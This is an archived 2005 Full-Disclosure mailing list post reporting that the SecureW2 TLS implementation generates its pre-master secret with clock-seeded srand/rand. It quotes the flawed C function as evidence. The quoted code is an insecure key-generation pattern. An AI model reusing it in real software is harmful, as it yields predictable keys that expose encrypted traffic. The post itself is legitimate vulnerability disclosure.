[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] SecureW2 TLS security problem
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] SecureW2 TLS security problem
- From: Simon Josefsson <jas@xxxxxxxxxxx>
- Date: Fri, 23 Sep 2005 12:14:00 +0200
Hi everyone! I was looking at the code for a TLS implementation, an
open source implementation "SecureW2" by Alfa & Ariss, see:
http://www.securew2.com/uk/index.htm
I found that it uses weak random numbers when generating the
pre-master-secret. The code is in "./Components/Common/release
3/version 0/source/CommonTLS.c" and quoted below.
It appear to be using the weak srand/rand functions seeded by the
milliseconds field from the system clock. That doesn't provide you
with 48 bytes of strong randomness, you are lucky to get even a few
bytes.
Regards,
Simon
//
// Name: TLSGenPMS
// Description: Generate the 48 random bytes for the PMS (Pre Master Secret)
// Author: Tom Rixom
// Created: 17 December 2002
//
DWORD
TLSGenPMS( IN OUT BYTE pbPMS[TLS_PMS_SIZE] )
{
int i = 0;
SYSTEMTIME SystemTime;
DWORD dwRet;
dwRet = NO_ERROR;
AA_TRACE( ( TEXT( "TLSGenPMS" ) ) );
pbPMS[0] = 0x03;
pbPMS[1] = 0x01;
//
// Time (DWORD)
//
GetLocalTime( &SystemTime );
srand( ( unsigned int ) SystemTime.wMilliseconds );
//srand( ( unsigned )time( NULL ) );
//
// Random bytes
//
for( i=2; i < TLS_PMS_SIZE; i++ )
pbPMS[i] = ( BYTE ) ( rand() % 255 );
AA_TRACE( ( TEXT( "TLSGenPMS::random bytes: %s" ), AA_ByteToHex( pbPMS,
TLS_PMS_SIZE ) ) );
return dwRet;
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/